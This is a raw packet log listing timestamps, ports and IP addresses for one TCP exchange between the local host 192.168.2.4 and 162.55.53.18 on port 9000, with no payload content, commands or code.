Jun 19, 2024 14:40:14.380659103 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.380671024 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.380688906 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.380707979 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.380882025 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.380928040 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.380959988 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.380975962 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.381002903 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.381027937 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.381048918 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.381063938 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.381093979 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.381114006 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.382199049 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.382258892 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.382311106 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.382327080 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.382386923 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.382424116 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.382440090 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.382455111 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.382482052 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.382499933 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.383064032 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.383079052 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.383094072 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.383106947 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.383115053 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.383125067 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.383138895 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.383171082 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.383610964 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.383670092 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.383680105 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.383686066 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.383709908 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.383735895 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.383739948 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.383757114 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.383783102 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.383801937 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.384908915 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.384968996 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.384998083 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.385013103 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.385047913 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.385061979 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.385071993 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.385077953 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.385099888 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.385132074 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.385427952 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.385442972 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.385478020 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.385481119 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.385493040 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.385509014 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.385509968 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.385539055 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.385539055 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.385559082 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.386464119 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.386481047 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.386496067 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.386531115 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.386560917 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.386609077 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.386626005 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.386656046 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.386687994 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.387176991 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.387232065 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.387391090 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.387407064 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.387423992 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.387435913 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.387470007 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.387470007 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.387770891 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.387788057 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.387816906 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.387844086 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.388309956 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.388380051 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.388428926 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.388444901 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.388461113 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.388475895 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.388478994 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.388525009 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.388525009 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.388550997 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.389091015 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.389153004 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.389153004 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.389168978 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.389197111 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.389229059 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.389261961 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.389305115 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.389523029 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.389539957 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.389575005 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.389589071 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.389594078 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.389605999 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.389640093 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.389671087 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.389975071 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390028000 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.390069962 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390084982 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390100002 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390116930 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390122890 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.390145063 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.390161991 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.390189886 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390206099 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390233040 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.390243053 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390259981 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.390296936 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.390628099 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390676975 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.390697956 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390712976 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390743017 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.390763044 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.390768051 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390784025 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390799999 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390815020 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.390830994 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390832901 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.390849113 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390866041 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390878916 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.390882969 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.390899897 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.390923977 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.390924931 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.391318083 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.391371965 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.391396046 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.391441107 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.391587019 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.391632080 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.391684055 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.391700029 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.391716003 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.391726017 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.391747952 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.391767979 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.391779900 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.391796112 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.391822100 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.391846895 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.391952991 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.391968012 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.391982079 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.391993046 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.391999006 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.392014980 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.392041922 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.392041922 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.392119884 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.392137051 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.392152071 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.392167091 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.392168045 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.392189980 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.392229080 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.392784119 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.392801046 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.392824888 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.392838001 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.392839909 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.392863035 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.392868042 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.392868042 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.392888069 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.392891884 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.392904997 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.392909050 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.392926931 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.392940044 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.392941952 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.392972946 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.392990112 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.392997026 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.393013000 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.393038034 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.393058062 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.393620968 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.393636942 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.393666983 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.393681049 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.393681049 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.393698931 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.393703938 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.393716097 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.393729925 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.393733978 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.393781900 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.393781900 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.393814087 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.393829107 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.393857956 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.393860102 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.393877983 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.393879890 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.393893957 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.393898010 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.393912077 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.393914938 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.393933058 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.393950939 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.393997908 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.394013882 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.394042969 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.394068003 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.394488096 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.394534111 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.394541979 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.394558907 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.394583941 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.394608021 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.462117910 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462184906 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462201118 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462208986 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.462260008 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.462260008 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.462474108 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462512970 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462518930 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.462527990 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462558031 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.462582111 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.462585926 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462615967 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462629080 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.462636948 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462646008 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.462655067 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462671041 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462678909 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.462707996 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.462769032 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462785006 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462800026 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462810040 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.462816000 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462833881 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462840080 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.462869883 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.462892056 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462932110 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.462933064 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462948084 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.462971926 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.462979078 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.463001013 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.463028908 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.463072062 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.463088036 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.463104963 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.463112116 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.463146925 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.553323984 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553349018 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553365946 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553406954 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.553406954 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.553452015 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553469896 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553500891 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.553520918 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.553572893 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553589106 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553605080 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553634882 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.553651094 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.553704977 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553725004 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553740978 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553751945 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.553757906 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553774118 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553781033 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.553791046 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553806067 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.553848982 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.553890944 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553905010 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553934097 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.553935051 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553946972 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.553955078 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553972006 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.553973913 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.554003954 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.554037094 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.554066896 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.554080963 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.554095984 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.554111004 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.554111958 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.554127932 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.554137945 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.554143906 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.554176092 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.554191113 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.645000935 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645061970 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645082951 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.645096064 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645122051 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.645131111 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645145893 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.645148039 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645165920 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.645169020 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.645184040 CEST	9000	49748	162.55.53.18	192.168.2.4
